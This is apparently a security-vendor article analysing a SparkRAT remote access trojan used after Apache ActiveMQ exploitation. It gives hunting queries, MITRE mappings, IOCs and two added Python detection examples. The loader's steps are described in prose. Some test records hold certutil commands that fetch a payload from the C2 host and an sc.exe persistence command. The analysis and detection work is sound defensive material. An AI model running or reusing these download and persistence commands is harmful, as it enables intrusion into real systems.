FortiEDR
FortiEDR automates the protection against advanced threats, pre and post-execution, with real time orchestrated incident response functionality.
mrobson (Staff)
Article Id 299271

Introduction

SparkRAT is an open source, cross-platform remote access tool (RAT) written in Go (Golang)[1]. SparkRAT has been employed by various threat actor groups including Winnti[2] and DragonSpark[3]. Most recently, SparkRAT was identified as a core component of post-exploitation activity associated with HelloKitty/TellYouThePass ransomware attacks involving exploitation of CVE-2023-46604, a vulnerability in Apache ActiveMQ[4]. SparkRAT clients are configurable and feature rich, supporting remote file operations, endpoint enumeration, screenshots and a remote terminal.

In this article we analyze a SparkRAT sample associated with the previously reported Apache ActiveMQ exploitation to demonstrate how FortiEDR detects and mitigates its operation. Included at the end of the article are threat hunting queries that can support proactive hunting for this behavior, MITRE ATT&CK mappings listing the observables for each technique employed by the analyzed SparkRAT sample, and IOCs related to this SparkRAT campaign.

 

Fig1.png

Figure 1. Attack flow diagram depicting the infection process for analyzed SparkRAT sample. 

 

Analysis

The sample analyzed in this article starts with the execution of a batch script (.bat file) located in the 'C:\Users\Public' directory. In the campaign targeting Apache ActiveMQ, this batch file would have been launched through exploitation of the vulnerable web application, resulting in a process creation for a cmd.exe process referencing the batch file. In our testing the batch file, named 'win.bat', was started from a PowerShell process instead.

The batch file contains a short sequence of commands: download a file from an external URL, execute the downloaded file, establish persistence by registering a new service that references the downloaded file, and finally delete the batch file itself. The contents are shown in the screenshot in Figure 2.

 

Fig2.png

Figure 2. Contents of win.bat used to launch SparkRAT infection. 

 

The certutil command contained within the batch file attempts to download the file at 'http://45.32.120[.]181/x86.exe' and save it as 'c:\users\public\86.dat'. This is an example of certutil being used for T1105: Ingress Tool Transfer[5], a well-documented use of a LOLBin (living-off-the-land binary) to attempt to evade detection: the download is performed by a signed Microsoft utility rather than by the attacker's own tooling. Note that the payload is written to disk with a '.dat' extension rather than '.exe', which is why the later process creation shows a '.dat' file being executed. This behavior is anomalous and is detected and blocked by FortiEDR, as it triggers the 'Suspicious Application – Connection Attempt from a Suspicious Application' rule in the Exfiltration Prevention policy. An example of the FortiEDR security event generated by this behavior is shown in Figure 3.

Fig3.png

Figure 3. FortiEDR security event generated as a result of the suspicious certutil behavior triggered by execution of the SparkRAT loader batch script. 

 

If the certutil command executes successfully, the downloaded file is written to 'c:\users\public\86.dat' by the certutil process. FortiEDR threat hunting telemetry can give additional context to these security events: a successful run produces a Process Creation event for the certutil process, an HTTP Request event linking the certutil process to the external URL, and a File Creation event for the downloaded file. A screenshot of the HTTP Request event is shown in Figure 4.

Fig4.png

Figure 4. FortiEDR Threat Hunting data showing the HTTP Request event created as the certutil process attempts to download the payload from the malicious URL.

Once '86.dat' has been downloaded through certutil, it is executed by the batch file. FortiEDR identifies the binary as anomalous and sends it for sandbox analysis. Given the unknown nature of the file, this execution is blocked by FortiEDR unless sandbox analysis identifies it as a likely legitimate false positive. In this case sandbox analysis determined the downloaded payload was malicious and identified it as a likely SparkRAT executable, as shown in the security event in Figure 5.

Fig5.png

Figure 5. FortiEDR security event related to the attempted execution of the downloaded ‘86.dat’ file (SparkRAT executable). 

 

Once executed, the SparkRAT implant begins attempting to contact its C2 server via web requests. FortiEDR detects and blocks this behavior because the network connection event originates from a process linked to a file already classified as malicious. The associated security event is shown in Figure 6.

Fig6.png

Figure 6. FortiEDR security event associated with the SparkRAT process attempting to contact its C2 following execution.

Each attempt to contact the C2 is also visible in FortiEDR threat hunting data by searching for network connections established by the SparkRAT process (86.dat). An example of the telemetry generated while testing our sample is shown in Figure 7.

Fig7.png

Figure 7. FortiEDR Threat Hunting telemetry includes Socket Connect events related to the SparkRAT process attempting to connect to its C2.

The IP of the C2 connection attempts, '45.32.120[.]181', matches the IP in the URL accessed by the initial certutil process to retrieve the SparkRAT payload, so the same host serves both as the payload staging server and as the C2. Using Fortinet's Central Threat System (CTS) we can see that this IP and the associated URL are both known indicators for recent SparkRAT campaigns. Relevant information from CTS on this IP is shown in Figure 8.

Fig8.png

Figure 8. Fortinet CTS data on the identified SparkRAT C2. Note the association with both installation and C2.

The next stage of the batch file execution establishes persistence for the SparkRAT executable by registering a new service called 'windowDefenSrv' with autostart enabled, whose binary path points at the '86.dat' executable, so the implant is relaunched at boot. FortiEDR threat hunting telemetry identifies this behavior through the Process Creation event generated for the sc.exe process; the service name and binary path are both visible in that event's command line. This telemetry is shown in Figure 9.

Fig9.png

Figure 9. FortiEDR threat hunting telemetry related to the creation of a new service used for SparkRAT persistence. 

 

Conclusion 

FortiEDR detects and mitigates the execution and subsequent behavior of SparkRAT as well as the deployment mechanism (the .bat file) employed in the analyzed campaign. Whilst SparkRAT is a configurable RAT, the behavioral detections demonstrated in this article are not tied to a specific C2 address, port or file name and remain effective across the configuration options currently available. In addition to the detection and protection offered by FortiEDR's security policies, threat hunting telemetry adds context to a SparkRAT intrusion. Threat hunting queries based on the available telemetry are included below to support hunting for SparkRAT execution and operation, together with IOCs and MITRE ATT&CK observables to support defensive activities.

Threat Hunting 

The following section provides threat hunting queries that parse FortiEDR threat hunting telemetry to identify events of interest that may be related to execution of the SparkRAT sample analyzed in this article. Many of these queries are generic: they detect the techniques employed by SparkRAT but may also surface other suspicious behavior. Organizations that have FortiEDR are recommended to load these queries as scheduled queries, both to add context to security events in their environment and to create detection overlap in case exceptions prevent the expected security events from being generated. Queries should be tuned before deployment in production.

The following query retrieves HTTP Request events associated with the certutil process whose command line contains the '-urlcache' argument. These events can represent ingress tool transfer using the built-in certutil command. False positives are possible where certutil is legitimately used to download remote certificates or CRLs, but these can be tuned out once benign activity is baselined in an organization's environment.

Type:"HTTP Request" AND Source.Process.Name:"certutil.exe" AND Source.Process.CommandLine:"-urlcache" 

 

 

The following query retrieves Process Creation events where the process executable is located in the default public user directory. This directory is writable by every interactive user and is a common place for malware to be staged for execution, as with the sample analyzed in this article. False positives are rare.

Type:"Process Creation" AND Target.Process.File.Path:"\\Users\\Public" 

 

 

The following query retrieves Process Creation events where the process executable has a '.dat' extension. Executables with this extension are non-standard, and the query will detect execution of the main SparkRAT executable analyzed in this article (86.dat).

Type:"Process Creation" AND Target.Process.File.Path:"*.dat" 

 

 

The following query detects HTTP Request events to the known SparkRAT C2 and Socket Connect events to the known SparkRAT C2. Note that both sets of atomic indicators in this query are taken from the sample analyzed in this article and do not represent all atomic indicators associated with other SparkRAT campaigns. Organizations may add further indicators using this query as a template.

(Type:"Socket Connect" AND RemoteIP:"45.32.120.181") OR (Type:"HTTP Request" AND URL:"http\:\/\/45.32.120.181\/*")

 

 

The following query returns Process Creation events for the sc.exe process where 'C:\Users\Public' (case insensitive) is referenced in the command line arguments. It is anomalous for a service binary to be registered from the public directory, and this directory is a common staging area for malware.

Type:"Process Creation" AND Target.Process.Name:"sc.exe" AND Target.Process.CommandLine:"c\:\\Users\\Public" 
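As an added example (not code from the article or from FortiEDR), the five queries above are expressed as Python predicates and run over a handful of constructed telemetry records shaped like the fields the queries reference. The records, the exact certutil and sc.exe command lines (the '-f' flag and the 'binPath= ... start= auto' form are assumed; the article only states that '-urlcache', '-split' and autostart were used) and the benign noise records are constructed for this example; the C2 IP, file names and service name are the article's. The block also pulls the service name, binary path and start type out of the sc.exe command line, which is what an analyst would extract from the Figure 9 event:

```python
"""Added example (not FortiEDR code): the five hunting queries above as Python
predicates, run over constructed telemetry records.

Record field names mirror the query fields (Type, Source.Process.*,
Target.Process.*, RemoteIP, URL). All events below are constructed; only the
C2 IP, file names and service name are taken from the article."""
import re
from collections import Counter
from urllib.parse import urlparse

KNOWN_C2_IPS = {"45.32.120.181"}  # refanged IOC from the analyzed sample

# Constructed telemetry: one record per event the article describes, plus two benign records.
TELEMETRY = [
    {"Type": "Process Creation", "Target.Process.Name": "cmd.exe",
     "Target.Process.File.Path": r"C:\Windows\System32\cmd.exe",
     "Target.Process.CommandLine": r"cmd.exe /c C:\Users\Public\win.bat"},
    {"Type": "HTTP Request", "Source.Process.Name": "certutil.exe",
     # '-f' is assumed; the article only confirms '-urlcache' and '-split'.
     "Source.Process.CommandLine":
         r"certutil -urlcache -split -f http://45.32.120.181/x86.exe c:\users\public\86.dat",
     "URL": "http://45.32.120.181/x86.exe"},
    {"Type": "Process Creation", "Target.Process.Name": "86.dat",
     "Target.Process.File.Path": r"C:\Users\Public\86.dat",
     "Target.Process.CommandLine": r"C:\Users\Public\86.dat"},
    {"Type": "Socket Connect", "Source.Process.Name": "86.dat",
     "RemoteIP": "45.32.120.181", "RemotePort": 81},
    {"Type": "Process Creation", "Target.Process.Name": "sc.exe",
     "Target.Process.File.Path": r"C:\Windows\System32\sc.exe",
     # Standard sc.exe syntax assumed for 'autostart'.
     "Target.Process.CommandLine":
         r'sc create windowDefenSrv binPath= "C:\Users\Public\86.dat" start= auto'},
    # Benign noise that the rules must not fire on.
    {"Type": "HTTP Request", "Source.Process.Name": "certutil.exe",
     "Source.Process.CommandLine": "certutil -verify signed.cer",
     "URL": "http://crl.example.test/ca.crl"},
    {"Type": "Process Creation", "Target.Process.Name": "notepad.exe",
     "Target.Process.File.Path": r"C:\Windows\System32\notepad.exe",
     "Target.Process.CommandLine": "notepad.exe"},
]


def _f(event, key):
    """Case-folded field lookup; a missing field matches nothing."""
    return str(event.get(key, "")).lower()


def certutil_urlcache_download(e):
    return (e["Type"] == "HTTP Request" and _f(e, "Source.Process.Name") == "certutil.exe"
            and "-urlcache" in _f(e, "Source.Process.CommandLine"))


def exec_from_users_public(e):
    return e["Type"] == "Process Creation" and "\\users\\public" in _f(e, "Target.Process.File.Path")


def exec_dat_extension(e):
    return e["Type"] == "Process Creation" and _f(e, "Target.Process.File.Path").endswith(".dat")


def known_c2_contact(e):
    if e["Type"] == "Socket Connect":
        return e.get("RemoteIP") in KNOWN_C2_IPS
    return e["Type"] == "HTTP Request" and (urlparse(e.get("URL", "")).hostname or "") in KNOWN_C2_IPS


def service_binpath_in_public(e):
    return (e["Type"] == "Process Creation" and _f(e, "Target.Process.Name") == "sc.exe"
            and "c:\\users\\public" in _f(e, "Target.Process.CommandLine"))


RULES = {fn.__name__: fn for fn in (certutil_urlcache_download, exec_from_users_public,
                                    exec_dat_extension, known_c2_contact, service_binpath_in_public)}

SC_CREATE = re.compile(r"\bsc(?:\.exe)?\s+create\s+(?P<name>\S+)", re.I)
SC_BINPATH = re.compile(r'binpath=\s*(?:"(?P<q>[^"]+)"|(?P<u>\S+))', re.I)
SC_START = re.compile(r"start=\s*(?P<start>\S+)", re.I)


def parse_sc_create(cmdline):
    """Extract service name, binary path and start type from an 'sc create' command line."""
    m = SC_CREATE.search(cmdline)
    if not m:
        return None
    b = SC_BINPATH.search(cmdline)
    s = SC_START.search(cmdline)
    return {"name": m.group("name"),
            "binpath": (b.group("q") or b.group("u")) if b else None,
            "start": s.group("start").lower() if s else None}


def run_rules(events):
    """Return (rule_name, event_index, detail) for every rule hit; detail is the parsed service for sc.exe hits."""
    hits = []
    for i, e in enumerate(events):
        for name, rule in RULES.items():
            if rule(e):
                detail = parse_sc_create(e["Target.Process.CommandLine"]) if name == "service_binpath_in_public" else None
                hits.append((name, i, detail))
    return hits


def summarize(events):
    """Hit count per rule, the shape a scheduled query's result would be reviewed in."""
    return dict(Counter(name for name, _, _ in run_rules(events)))


if __name__ == "__main__":
    for name, idx, detail in run_rules(TELEMETRY):
        print(f"{name:28s} event#{idx} {detail or ''}")
```

Because the predicates match on substrings the same way the FortiEDR queries do, tuning is a matter of adding exclusions (for example a known certificate-distribution host for the certutil rule) rather than rewriting the rule; the two benign records show that a certificate verification and an ordinary process creation pass through untouched.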

 

 

 

MITRE ATT&CK Mapping 

Initial Access

Technique ID | Technique Description | Observed Activity
T1190 | Exploit Public-Facing Application | Initial exploitation and delivery of the post-exploitation payload is through web requests targeting the Apache ActiveMQ vulnerability CVE-2023-46604.

Execution

Technique ID | Technique Description | Observed Activity
T1059.003 | Command and Scripting Interpreter – Windows Command Shell | A batch file (win.bat) run by cmd.exe is used for initial execution; the SparkRAT payload also spawns a cmd.exe child process after it starts.

Persistence

Technique ID | Technique Description | Observed Activity
T1543.003 | Create or Modify System Process – Windows Service | The batch file (win.bat) uses sc.exe to create a service named 'windowDefenSrv' with autostart enabled that launches the SparkRAT executable (86.dat). This is for persistence, as the downloaded payload has already been executed earlier in the batch file.

Defense Evasion

Technique ID | Technique Description | Observed Activity
T1036.004 | Masquerading – Masquerade Task or Service | The service name used for persistence, 'windowDefenSrv', is likely an attempt to masquerade as a Windows Defender support service.
T1070.004 | Indicator Removal – File Deletion | The batch file used for initial installation and execution of SparkRAT deletes itself after it finishes, likely to hide evidence of the activity it performed.

Discovery

Technique ID | Technique Description | Observed Activity
T1082 | System Information Discovery | On execution the SparkRAT executable launches a cmd.exe process and runs the 'ver' command, likely to identify the Windows version it is operating on.

Command and Control

Technique ID | Technique Description | Observed Activity
T1071.001 | Application Layer Protocol – Web Protocols | The initial batch script uses certutil web requests to download the main SparkRAT payload, and the SparkRAT executable then communicates with its C2 server over HTTP (ports are listed under T1571).
T1571 | Non-Standard Port | For the analyzed sample, installation web requests are sent on port 8000 and C2 requests to port 81. SparkRAT is a configurable tool, so ports may change between campaigns.
T1105 | Ingress Tool Transfer | Download through certutil using the '-urlcache' and '-split' arguments. The downloaded file (86.dat) was written to the 'C:\Users\Public' directory and retained for persistence following initial execution.

 

 

IOCs 

The following IOCs relate to the SparkRAT sample analyzed in this article. Note that SparkRAT is an open source tool employed by various actors, so atomic indicators like these represent a very small subset of the IOCs related to global malicious SparkRAT activity.

 

Indicator Description | Indicator | Indicator Type | Associated Tactic | Notes | First Observed
Malicious Script | FAC45F5210A2AA9A55EFB31CBADB4CF5890F729E | SHA1 Hash | Installation | 'win.bat', batch file used to download and execute the SparkRAT executable | 2023-10-10
Malicious Script | 89B8ACD3154735754120E3E4E62C0ACE66920886725015CCDFC72FF580AF5D21 | SHA256 Hash | Installation | 'win.bat', batch file used to download and execute the SparkRAT executable | 2023-10-10
Malicious Executable | 6E6CC959342A1A0195140C4A829744898ED82097 | SHA1 Hash | C2 | '86.dat', SparkRAT executable | 2023-10-10
Malicious Executable | D065D44D0412AEF867F66626B5C4A3D7D0A3BDB59C61712B0C71EFBF9865A7A6 | SHA256 Hash | C2 | '86.dat', SparkRAT executable | 2023-10-10
Malicious URL | http://45.32.120[.]181/x86.exe | URL | Installation | C2 server hosting the SparkRAT executable, pulled by certutil | 2023-10-10
Malicious IP | 45.32.120[.]181 | IP | C2 | C2 contacted by the SparkRAT executable | 2023-10-10
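The following is an added example (not code from the article or from FortiEDR) showing how the atomic indicators above can be consumed in a quick local sweep: the published hashes are loaded into a lookup table, files under a staging directory are hashed and compared, and the defanged network indicators are refanged before being loaded into a blocklist or query. The hashes and network indicators are copied from the table; the function names, directory patterns and sample inputs are constructed for the example:

```python
"""Added example (not FortiEDR code): local IOC sweep for the indicators in the
table above. Hashes and network indicators are copied from the article; the
function names, file patterns and sample inputs are constructed."""
import hashlib
from pathlib import Path

# File hashes from the IOC table, upper-case hex as published.
IOC_HASHES = {
    "FAC45F5210A2AA9A55EFB31CBADB4CF5890F729E": "win.bat (SparkRAT loader script)",
    "89B8ACD3154735754120E3E4E62C0ACE66920886725015CCDFC72FF580AF5D21": "win.bat (SparkRAT loader script)",
    "6E6CC959342A1A0195140C4A829744898ED82097": "86.dat (SparkRAT executable)",
    "D065D44D0412AEF867F66626B5C4A3D7D0A3BDB59C61712B0C71EFBF9865A7A6": "86.dat (SparkRAT executable)",
}

# Network IOCs are published defanged; refang them before use in a blocklist or query.
DEFANGED_NETWORK_IOCS = ["45.32.120[.]181", "http://45.32.120[.]181/x86.exe"]


def refang(indicator: str) -> str:
    """Undo the common defanging conventions ('[.]' and 'hxxp')."""
    return (indicator.replace("[.]", ".")
            .replace("hxxps://", "https://")
            .replace("hxxp://", "http://"))


def file_hashes(data: bytes) -> dict:
    """SHA1 and SHA256 of file content, upper-cased to match the published table."""
    return {"sha1": hashlib.sha1(data).hexdigest().upper(),
            "sha256": hashlib.sha256(data).hexdigest().upper()}


def match_file(data: bytes, iocs=IOC_HASHES):
    """Return the IOC label if either digest of the content is a known indicator, else None."""
    for digest in file_hashes(data).values():
        if digest in iocs:
            return iocs[digest]
    return None


def sweep_items(items, iocs=IOC_HASHES):
    """items: iterable of (path, bytes). Returns [(path, label)] for every IOC hit."""
    hits = []
    for path, data in items:
        label = match_file(data, iocs)
        if label:
            hits.append((str(path), label))
    return hits


def sweep_directory(directory, patterns=("*.dat", "*.bat", "*.exe"), iocs=IOC_HASHES):
    """Hash every matching file under the directory (C:\\Users\\Public in the analyzed campaign)."""
    root = Path(directory)
    items = ((p, p.read_bytes()) for pat in patterns for p in root.rglob(pat) if p.is_file())
    return sweep_items(items, iocs)


if __name__ == "__main__":
    print("network indicators:", [refang(i) for i in DEFANGED_NETWORK_IOCS])
    print("file hits:", sweep_directory(r"C:\Users\Public"))
```

Matching on the SHA1 or SHA256 of file content rather than on the '86.dat' name still catches the same payload if an operator renames it, but not a rebuilt SparkRAT client, which is why the behavioral queries in the Threat Hunting section remain the primary detection and these atomic indicators are a supplement.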

 

 

[1] https://github.com/XZB-1248/Spark

[2] https://blog.exatrack.com/melofee/

[3] https://www.sentinelone.com/labs/dragonspark-attacks-evade-detection-with-sparkrat-and-golang-source...

[4] https://arcticwolf.com/resources/blog/tellmethetruth-exploitation-of-cve-2023-46604-leading-to-ranso...

[5] https://attack.mitre.org/techniques/T1105/
